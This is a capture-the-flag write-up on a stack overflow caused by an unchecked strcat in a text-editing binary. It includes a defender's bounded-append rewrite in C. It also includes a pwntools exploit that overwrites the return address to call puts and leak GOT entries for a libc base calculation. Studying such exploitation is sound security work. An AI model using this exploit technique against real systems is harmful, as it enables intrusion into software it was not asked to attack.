So, when I add a text its maximum length is 0x30 bytes, but when editing the text there are two options:

Shell

Enter ur option:2
[1]Append text
[2]Overwrite

When I choose the first option, the vulnerability becomes visible:

C

src = (char *)read_stdin(50);   /* up to 50 bytes of user input */
strcat(&dest, src);             /* appended with no check against the size of dest */

strcat appends into dest without any length check, so an over-long append overflows the buffer on the stack. If we create a text 0x4A bytes long, we can overwrite the return address.
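As an added defender's example (not code from the writeup or the challenge binary), here is a bounded replacement for the strcat(&dest, src) append above, enforcing the 0x30 limit on the append path as well as the add path; text_t, text_set, text_append and demo_append are hypothetical names.

```c
#include <stdbool.h>
#include <string.h>

#define TEXT_MAX 0x30  /* maximum text length from the challenge */

/* Hypothetical text holder: TEXT_MAX characters plus the terminator. */
typedef struct { char buf[TEXT_MAX + 1]; } text_t;

/* Option [2] Overwrite, bounded: reject src if it does not fit. */
bool text_set(text_t *t, const char *src) {
    size_t len = strlen(src);
    if (len > TEXT_MAX) return false;
    memcpy(t->buf, src, len + 1);
    return true;
}

/* Option [1] Append, the hardened form of strcat(&dest, src): the
 * append is refused as a whole when it would overflow, and the buffer
 * is left unchanged rather than silently truncated. */
bool text_append(text_t *t, const char *src) {
    const char *end = memchr(t->buf, '\0', sizeof t->buf);
    if (end == NULL) return false;            /* buffer not terminated */
    size_t used = (size_t)(end - t->buf);
    size_t len = strlen(src);
    if (len > TEXT_MAX - used) return false;  /* would overflow */
    memcpy(t->buf + used, src, len + 1);
    return true;
}

/* Replays the writeup's sequence: add a text of initial_len bytes, then
 * append append_len bytes. Returns the final length, -1 if the append
 * was refused, or -2 if the initial text was refused. */
int demo_append(size_t initial_len, size_t append_len) {
    char tmp[0x100];
    text_t t = { { 0 } };
    if (initial_len >= sizeof tmp || append_len >= sizeof tmp) return -2;
    memset(tmp, 'A', initial_len);
    tmp[initial_len] = '\0';
    if (!text_set(&t, tmp)) return -2;
    memset(tmp, 'B', append_len);
    tmp[append_len] = '\0';
    if (!text_append(&t, tmp)) return -1;
    return (int)strlen(t.buf);
}
```

With this check the writeup's 0x30-byte text followed by a 0x26-byte append (the 'B' padding plus the three packed addresses) is refused instead of reaching the saved return address.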

The exploit

A full exploit needs a memory leak that reveals the libc virtual address. For that purpose we can print the .got entries, which hold the virtual addresses of the libc functions the binary imports.

Python

from pwn import p32, u32  # pwntools packers; the socket s and the add_text, edit_text and _exit helpers are not shown in this excerpt

print "[*] Triggering memory leaks..."
jmp_puts = 0x08048420         # PLT stub for puts
got = 0x0804A00C              # first GOT entry to dump
pc = p32(jmp_puts)            # overwritten return address -> puts
ret = p32(0x0804862F)         # address puts returns to
arg0 = p32(got)               # argument of puts: the GOT
overflow = pc + ret + arg0
add_text('A' * 0x30)                        # fill the 0x30-byte text
edit_text(1, 'B' * (0x18 + 2) + overflow)   # option [1] Append: pad up to the saved return address, then overwrite it
_exit()
r = s.recv(1024)
print "[*] Getting libc virtual addresses..."
VAs = map(''.join, zip(*[iter(r)] * 4))     # split the leak into 4-byte GOT entries
printf = u32(VAs[0])
fgets = u32(VAs[1])
strcat = u32(VAs[2])
puts = u32(VAs[3])
strchr = u32(VAs[4])
libc_start_main = u32(VAs[5])
setvbuf = u32(VAs[6])
atoi = u32(VAs[7])
print "[*] printf @ 0x%x" % printf
print "[*] fgets @ 0x%x" % fgets
print "[*] strcat @ 0x%x" % strcat
print "[*] puts @ 0x%x" % puts
print "[*] strchr @ 0x%x" % strchr
print "[*] __libc_start_main @ 0x%x" % libc_start_main
print "[*] atoi @ 0x%x" % atoi

In this challenge we are given the libc, so from the leaked addresses we can compute the libc base and the addresses of other functions.